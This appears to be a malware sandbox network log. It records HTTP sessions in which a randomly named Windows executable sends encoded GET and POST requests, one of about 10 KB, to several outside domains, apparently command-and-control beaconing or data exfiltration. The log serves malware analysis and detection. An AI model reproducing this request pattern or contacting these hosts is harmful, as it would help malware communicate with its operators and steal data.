                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 38 52 2f 45 70 72 72 72 6f 63 66 6a 30 55 4c 56 33 38 6c 34 66 79 5a 47 66 72 49 38 77 44 4b 6a 4f 6b 34 66 56 63 31 70 48 53 6f 69 37 73 4a 4f 55 50 4b 69 4c 7a 59 71 4e 36 78 4e 38 56 49 6c 5a 56 77 74 62 2f 62 34 72 63 73 63 42 59 44 46 49 66 38 52 67 4f 6a 50 32 31 53 48 6c 6d 6b 68 79 44 70 4b 5a 68 39 4a 55 43 38 36 48 70 31 49 6b 76 44 6c 73 4d 4c 6c 38 43 48 4a 44 56 52 6d 74 66 6e 4d 4f 73 6c 41 72 48 4e 48 37 45 31 44 52 50 62 72 4f 4e 36 4c 51 49 79 74 6f 56 77 6d 4a 30 6b 75 2f 79 4f 31 71 51 6d 46 41 49 6a 54 52 77 46 78 37 73 63 65 44 43 47 67 4c 4c 73 39 50 4e 6c 6d 53 41 61 2f 62 6e 74 6e 54 71 65 6f 56 4d 5a 79 70 4c 75 37 76 79 32 66 67 51 36 73 61 31 65 4d 4b 45 79 4f 4d 6b 73 32 58 73 51 34 41 51 78 6e 53 54 6d 42 5a 55 78 78 62 35 4f 2f 2f 2f 53 55 77 76 73 6a 44 32 5a 32 59 4e 4c 56 51 4d 39 46 78 54 74 67 47 57 32 78 39 73 57 33 6e 51 72 6b 41 2b 42 49 64 36 56 61 66 77 55 58 6b 64 49 57 36 79 53 69 67 4d 31 76 38 77 50 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=C2Cm4mvFygX48R/Eprrrocfj0ULV38l4fyZGfrI8wDKjOk4fVc1pHSoi7sJOUPKiLzYqN6xN8VIlZVwtb/b4rcscBYDFIf8RgOjP21SHlmkhyDpKZh9JUC86Hp1IkvDlsMLl8CHJDVRmtfnMOslArHNH7E1DRPbrON6LQIytoVwmJ0ku/yO1qQmFAIjTRwFx7sceDCGgLLs9PNlmSAa/bntnTqeoVMZypLu7vy2fgQ6sa1eMKEyOMks2XsQ4AQxnSTmBZUxxb5O///SUwvsjD2Z2YNLVQM9FxTtgGW2x9sW3nQrkA+BId6VafwUXkdIW6ySigM1v8wPLFTxBLDyLJYVliRqQyad0dvXoY+oIEAYO8HHSVFhgkInw7OUUciDb7qysHurJ/olmRMJPoUZg9GMRt9jwTHQ7BnOXG1opmFio059StPqIaJLdHWTJxObzKDpX5aCv7DY4IFk4QPuEsEknDURd3WzeXgyV+zejavbDw+QAaTlLG48tK2diudKYZEWzDobKOSlIKlFzzec3N7xCKmwqEsugRho7YCOHRXm9Sk3VhMxXRfJTS13ulYIKHJPDGCNvTMD/KNchm3y15hGjIRQOVifJZyRuPUUSj3HqbE2u4swZweVjE74BKLnh7r1BShK0NDobhHTZsXYVWpYWLwZAQdB3VZXkjgYobm+FBKHkNkrdLMiuB4XwCiVqJPm43kIfC9OYQHyACUTkcgJ9wJMDNOzj2PaA2/5JkGpPUzaqL0XoUF+h5fHbgVzqGK/OQXWOfZ/gzChzKXbdDb9XIWalbeTL53MTPSbf0YFpjacBwMEjylj2znFQ1kyIdxPhXIFdVBq1ewDmIi+pMYVm3F56s06nx930WBslujVzWwh7E9hLZ/YSjhol7U6P88Wfk+ad5Cy0GNPg4CxSOxhSUFkKlNWWCcKDZSikfdpuG9GlEfglodhfkCh8X2q8tUtfnEmY9aAwWFtod0usDGUcCZJewW95c2nRrWMaA8iaS [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:03:01.385833025 CEST779INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:01 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                  Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.450027217.160.0.231801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:03.236032009 CEST531OUTGET /jp2s/?oFA=_z5x9B5&kf-HBx=P0qG7QiazDWD2BWelIei5OaE3G7F+t1+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4wdAdC4fEO7kU/4v+0UaEqAZT5BgARj9CDCY= HTTP/1.1
                                                                                                                                  Host: www.coffee-and-blends.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:03:04.071456909 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 1271
                                                                                                                                  Connection: close
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:03 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:03:04.071521044 CEST203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                                                                                                  Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.45002854.179.173.60801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:09.837869883 CEST793OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                  Host: www.tmstore.click
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tmstore.click
                                                                                                                                  Referer: http://www.tmstore.click/qmcg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 57 37 63 36 68 58 57 34 61 74 42 6a 35 4f 75 52 75 77 56 69 53 65 2f 52 37 74 6e 44 79 78 32 39 46 6f 65 72 4a 35 4e 57 37 73 59 69 38 4f 74 32 75 44 4b 51 55 63 33 5a 68 74 41 4b 53 56 4c 74 4b 34 53 2b 63 66 51 46 76 2b 36 58 46 6f 4d 6a 48 79 50 37 31 54 72 34 32 55 62 2b 4f 64 6d 79 45 48 66 69 6d 4c 69 6a 51 33 78 71 4e 56 61 68 74 37 58 69 6f 6f 54 32 67 51 4d 54 4f 6e 5a 74 4a 74 33 45 72 6a 61 73 46 38 45 58 32 54 64 68 76 54 4f 4f 58 47 45 73 72 72 58 34 4d 62 45 72 74 36 72 68 4b 6f 4c 56 7a 75 53 70 6d 2f 47 4a 70 68 58 48 72 67 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=35ggt26dJQJxW7c6hXW4atBj5OuRuwViSe/R7tnDyx29FoerJ5NW7sYi8Ot2uDKQUc3ZhtAKSVLtK4S+cfQFv+6XFoMjHyP71Tr42Ub+OdmyEHfimLijQ3xqNVaht7XiooT2gQMTOnZtJt3ErjasF8EX2TdhvTOOXGEsrrX4MbErt6rhKoLVzuSpm/GJphXHrg==
                                                                                                                                  Oct 24, 2024 08:03:10.833158016 CEST364INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:10 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 166
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.tmstore.click/qmcg/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  22192.168.2.45002954.179.173.60801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:12.380589962 CEST813OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                  Host: www.tmstore.click
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tmstore.click
                                                                                                                                  Referer: http://www.tmstore.click/qmcg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 58 61 73 36 6a 30 2b 34 62 4e 42 69 79 75 75 52 6b 51 55 72 53 5a 33 52 37 6f 65 45 7a 43 65 39 45 49 75 72 49 39 68 57 34 73 59 69 75 75 74 35 6a 6a 4b 4c 55 63 36 36 68 74 4d 4b 53 56 76 74 4b 39 75 2b 63 6f 4d 61 76 75 36 52 4b 49 4d 62 59 69 50 37 31 54 72 34 32 55 50 59 4f 5a 4b 79 45 32 76 69 6d 76 4f 69 5a 58 78 31 64 31 61 68 6e 62 58 6d 6f 6f 54 66 67 52 42 30 4f 6c 68 74 4a 73 48 45 73 32 36 76 4b 38 45 64 36 44 63 73 75 79 75 65 53 56 30 68 70 37 4c 4a 4f 4c 56 4f 6c 63 36 37 62 5a 71 43 68 75 32 61 37 34 50 39 6b 69 71 4f 77 76 53 51 72 72 76 70 47 74 47 51 44 67 35 6b 68 4c 38 76 5a 45 51 3d
                                                                                                                                  Data Ascii: kf-HBx=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzCe9EIurI9hW4sYiuut5jjKLUc66htMKSVvtK9u+coMavu6RKIMbYiP71Tr42UPYOZKyE2vimvOiZXx1d1ahnbXmooTfgRB0OlhtJsHEs26vK8Ed6DcsuyueSV0hp7LJOLVOlc67bZqChu2a74P9kiqOwvSQrrvpGtGQDg5khL8vZEQ=
                                                                                                                                  Oct 24, 2024 08:03:13.393605947 CEST364INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:13 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 166
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.tmstore.click/qmcg/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  23192.168.2.45003054.179.173.60801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:15.692692995 CEST10895OUTPOST /qmcg/ HTTP/1.1
                                                                                                                                  Host: www.tmstore.click
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.tmstore.click
                                                                                                                                  Referer: http://www.tmstore.click/qmcg/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 33 35 67 67 74 32 36 64 4a 51 4a 78 58 61 73 36 6a 30 2b 34 62 4e 42 69 79 75 75 52 6b 51 55 72 53 5a 33 52 37 6f 65 45 7a 45 47 39 46 37 6d 72 48 38 68 57 35 73 59 69 31 75 74 36 6a 6a 4c 52 55 64 53 6d 68 74 52 33 53 54 72 74 4c 62 36 2b 4e 36 6b 61 6b 75 36 52 53 49 4d 67 48 79 50 79 31 54 37 30 32 55 66 59 4f 5a 4b 79 45 30 6e 69 76 62 69 69 66 58 78 71 4e 56 61 74 74 37 58 4f 6f 73 2f 6c 67 52 45 44 62 46 42 74 4a 4d 58 45 70 43 61 76 56 4d 45 62 35 44 64 2f 75 79 6a 5a 53 56 35 51 70 34 58 76 4f 4a 4a 4f 67 4a 4c 5a 65 4c 43 56 6a 6f 69 33 6c 49 72 4d 72 42 65 4b 39 4e 43 4b 6c 65 76 52 63 34 6d 51 48 52 45 75 7a 72 41 50 64 41 52 2f 44 48 48 59 67 4d 2b 53 35 6d 68 6c 47 49 66 38 55 36 31 52 4e 69 76 4b 6c 6c 32 67 70 38 50 79 4c 65 42 54 38 68 38 47 5a 32 34 69 75 63 45 72 6a 31 35 57 6f 74 62 61 43 41 43 67 34 47 70 48 75 53 48 32 52 49 2b 77 44 70 68 36 6c 47 44 6f 75 75 70 51 61 6a 64 4b 68 66 47 66 47 5a 34 4a 66 48 47 68 42 48 54 78 6d 32 59 44 69 43 78 44 66 33 77 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzEG9F7mrH8hW5sYi1ut6jjLRUdSmhtR3STrtLb6+N6kaku6RSIMgHyPy1T702UfYOZKyE0nivbiifXxqNVatt7XOos/lgREDbFBtJMXEpCavVMEb5Dd/uyjZSV5Qp4XvOJJOgJLZeLCVjoi3lIrMrBeK9NCKlevRc4mQHREuzrAPdAR/DHHYgM+S5mhlGIf8U61RNivKll2gp8PyLeBT8h8GZ24iucErj15WotbaCACg4GpHuSH2RI+wDph6lGDouupQajdKhfGfGZ4JfHGhBHTxm2YDiCxDf3wWrcyWFjpoUckMoBcqEEJi+wJSgcJDgCRmK+kn6kbANQyrd1i5PJ6asMxgi/hT3xtiW8kKFIvG6RR5V1+SZqR1mWT/82q+aDvZjMIQ9B8rKraPIzeA0lpUhMZ0n3KX1/fQoLXUS2m678dsJzeev7Xz7C4ffdsbGhc8y26lgLv13U0qQYGJid+KqGSQIvo+O6a0HWFYsYNF1+qp1FHoXDaKJLr8fqjWvpVDxbCT4PWG3oImDGhx7bvcaLK28S090La3BeNv/8XF1Y6S0B/ru9lo8tbIfUmnPexVnlhvOExkt40nc3Xj7HLYXmpHG8mrt6DekiT4t9eyDOmLm/sko3F8jUCa2ojlFqorlwKUgEhqPgn12DnRQeFulbhMZj7mTAKuFtCutT5RctM0xNdwMeYBKCA5+7xQLlcVrExRzIJqaxgg4C7lGyglRQ3Pn9zzkteyzdI8Y7JhwLjlvySw5Pt5/zYUhKfzabv2WR0ImrXMMaiqDvvf/Qt0KCCqiKnqK7hUOtFTn63c74tayG1yKPVPKlbMS1LUmNUPEKQAaeqRtcdIHIpiYtokHjuMULKTAtDJbyGSLfO63LZ4txhQaAIQuM7AjZtjGyV9W9w1FYGrchW/zQWss/udn5zENR3c9nMX3ACaoSVTUsYSrD/gQIRuI6W8o3i2fIIUw [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:03:16.687108040 CEST364INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:16 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 166
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.tmstore.click/qmcg/
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  24192.168.2.45003154.179.173.60801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:18.232958078 CEST522OUTGET /qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.tmstore.click
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:03:19.222012043 CEST504INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:03:19 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 166
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzJi3IqMGAEHDzAW40nPzBt7ZJ3Wrnor3ezI=&oFA=_z5x9B5
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  25192.168.2.4500323.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:24.486469030 CEST799OUTPOST /xia9/ HTTP/1.1
                                                                                                                                  Host: www.softillery.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.softillery.info
                                                                                                                                  Referer: http://www.softillery.info/xia9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
